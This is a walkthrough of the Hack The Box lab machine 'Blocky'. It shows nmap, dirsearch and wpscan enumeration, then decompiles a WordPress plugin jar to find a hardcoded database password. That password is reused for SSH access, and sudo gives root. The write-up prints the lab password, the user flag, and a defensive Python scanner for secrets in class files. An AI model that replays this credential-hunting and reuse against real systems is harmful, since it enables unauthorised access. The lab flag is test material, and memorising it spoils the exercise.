2020-04-07

HTB::Blocky Walkthrough

0x01 Info Card

0x02 Tools and Tips

  • nmap
  • dirsearch
  • wpscan
  • jad

0x03 Pentesting

Initial Enumeration

nmap scan

Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-14 10:54 CET
Nmap scan report for 10.10.10.37
Host is up (0.085s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp closed sophos
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.32 seconds

dirsearch scan

$ ./dirsearch.py -u 10.10.10.37 -e * 
[08:44:06] 301 - 0B - /index.php -> http://10.10.10.37/
[08:44:09] 301 - 315B - /javascript -> http://10.10.10.37/javascript/
[08:44:13] 200 - 19KB - /license.txt
[08:44:37] 301 - 315B - /phpmyadmin -> http://10.10.10.37/phpmyadmin/
[08:44:41] 200 - 10KB - /phpmyadmin/
[08:44:42] 301 - 312B - /plugins -> http://10.10.10.37/plugins/
[08:44:46] 200 - 7KB - /readme.html
[08:44:52] 403 - 299B - /server-status
[08:44:52] 403 - 300B - /server-status/
[08:45:21] 200 - 380B - /wiki/
[08:45:21] 301 - 313B - /wp-admin -> http://10.10.10.37/wp-admin/
[08:45:21] 301 - 309B - /wiki -> http://10.10.10.37/wiki/
[08:45:21] 302 - 0B - /wp-admin/ -> http://10.10.10.37/wp-login.php?redirect_to=http%3A%2F%2F10.10.10.37%2Fwp-admin%2F&reauth=1
[08:45:22] 200 - 1KB - /wp-admin/install.php
[08:45:22] 500 - 4KB - /wp-admin/setup-config.php
[08:45:22] 200 - 0B - /wp-content/
[08:45:22] 301 - 315B - /wp-content -> http://10.10.10.37/wp-content/
[08:45:23] 200 - 69B - /wp-content/plugins/akismet/akismet.php
[08:45:23] 200 - 965B - /wp-content/uploads/
[08:45:23] 301 - 316B - /wp-includes -> http://10.10.10.37/wp-includes/
[08:45:23] 500 - 0B - /wp-includes/rss-functions.php
[08:45:23] 200 - 2KB - /wp-login.php
[08:45:23] 200 - 40KB - /wp-includes/
[08:45:24] 405 - 42B - /xmlrpc.php

Task Completed

wpscan

[i] User(s) Identified:

[+] notch
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] Notch
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] WPVulnDB API OK
| Plan: free
| Requests Done (during the scan): 3
| Requests Remaining: 47

Getting User Access

Visit http://10.10.10.37/plugin

Download and extract BlockyCore.jar. Once BlockyCore.class has been extracted, all we need to do to print out its contents is run the jad decompiler on it.

$ jad BlockyCore.class
Parsing BlockyCore.class...The class file version is 52.0 (only 45.3, 46.0 and 47.0 are supported)
Generating BlockyCore.jad

$ cat BlockyCore.jad
// Decompiled by Jad v1.5.8e. Copyright 2001 Pavel Kouznetsov.
// Jad home page: http://www.geocities.com/kpdus/jad.html
// Decompiler options: packimports(3)
// Source File Name: BlockyCore.java
package com.myfirstplugin;
public class BlockyCore
{
    public BlockyCore()
    {
        sqlHost = "localhost";
        sqlUser = "root";
        sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
    }

    public void onServerStart()
    {
    }

    public void onServerStop()
    {
    }

    public void onPlayerJoin()
    {
        sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!");
    }

    public void sendMessage(String s, String s1)
    {
    }

    public String sqlHost;
    public String sqlUser;
    public String sqlPass;
}

This gives us the credentials notch : 8YsqfCTnvxAUeduzjNSXe22 (the database password hardcoded in the plugin is reused for the notch account).
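Hardcoded credentials in shipped bytecode are what made this foothold possible, and they can be caught before a plugin is published. As an added example (not code from the original post or from the plugin), the following Python walks a .class file's constant pool and flags string literals that look like secrets; SAMPLE_CLASS is a constructed stand-in for BlockyCore.class, and the entropy threshold is an assumed heuristic.

```python
# Scan a Java .class constant pool for hard-coded secrets (how sqlPass leaked from BlockyCore.class).
# Added example for this walkthrough: SAMPLE_CLASS is constructed and the entropy cutoff is a heuristic.
import math
import struct

# Constant-pool tag -> fixed body size in bytes (tag 1, Utf8, is variable-length)
_FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
          15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}

def constant_pool(data):
    """Return (Utf8 entries by pool index, Utf8 indices used by CONSTANT_String)."""
    magic, _minor, _major, count = struct.unpack_from(">IHHH", data, 0)
    assert magic == 0xCAFEBABE, "not a class file"
    pos, utf8, strings, i = 10, {}, [], 1
    while i < count:
        tag, pos = data[pos], pos + 1
        if tag == 1:                          # CONSTANT_Utf8: u2 length + bytes
            (length,) = struct.unpack_from(">H", data, pos)
            utf8[i] = data[pos + 2:pos + 2 + length].decode("utf-8", "replace")
            pos += 2 + length
        else:
            if tag == 8:                      # CONSTANT_String -> index of its Utf8
                strings.append(struct.unpack_from(">H", data, pos)[0])
            pos += _FIXED[tag]
            i += tag in (5, 6)                # long/double occupy two pool slots
        i += 1
    return utf8, strings

def entropy(s):                               # Shannon entropy, bits per character
    return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s)) for c in set(s))

def suspicious_literals(data, min_len=12, min_entropy=3.5):
    """String literals that are long, space-free and high-entropy: likely secrets."""
    utf8, strings = constant_pool(data)
    return [utf8[i] for i in strings if len(utf8[i]) >= min_len
            and " " not in utf8[i] and entropy(utf8[i]) >= min_entropy]

def secret_field_names(data):
    """Identifiers in the pool that hint at credentials, e.g. the sqlPass field."""
    return sorted(s for s in constant_pool(data)[0].values()
                  if any(k in s.lower() for k in ("pass", "pwd", "secret", "token")))

# Constructed stand-in for BlockyCore.class: header plus an 11-entry constant pool
def _utf8(s): return b"\x01" + struct.pack(">H", len(s.encode())) + s.encode()
def _string(idx): return b"\x08" + struct.pack(">H", idx)   # points at a Utf8 index
SAMPLE_CLASS = (struct.pack(">IHHH", 0xCAFEBABE, 0, 52, 12)
    + _utf8("com/myfirstplugin/BlockyCore") + b"\x07\x00\x01" + _utf8("sqlPass")  # 1-3
    + _utf8("localhost") + _string(4) + _utf8("root") + _string(6)                # 4-7
    + _utf8("8YsqfCTnvxAUeduzjNSXe22") + _string(8)                               # 8-9
    + _utf8("Welcome to the BlockyCraft!!!!!!!") + _string(10))                   # 10-11
```

Run it over every class inside a jar (zipfile gives you the bytes) as a pre-release check; the field-name hint and the entropy filter each catch the BlockyCore pattern on their own.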

SSH with notch

$ ssh notch@10.10.10.37
notch@10.10.10.37's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.


Last login: Tue Jul 25 11:14:53 2017 from 10.10.14.230
notch@Blocky:~$ id
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
notch@Blocky:~$ ls
minecraft user.txt
notch@Blocky:~$ cat user.txt
59fee0977fb60b8a0bc6e41e751f3cd5

Getting Root Access

notch@Blocky:~$ cat .bash_history
sudo su
cat .bash_history
echo "" > .bash_history
exit
poweroff
sudo poweroff
notch@Blocky:~$ sudo -l
[sudo] password for notch:
Matching Defaults entries for notch on Blocky:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
(ALL : ALL) ALL

Get root flag

notch@Blocky:~$ cat /root/root.txt
cat: /root/root.txt: Permission denied
notch@Blocky:~$ sudo su
root@Blocky:/home/notch# cat /root/root.txt

0x04 Conclusion

0x05 Reference

https://ech1.netlify.com/htb/easy/1

Copyright © ca01h 2019-2020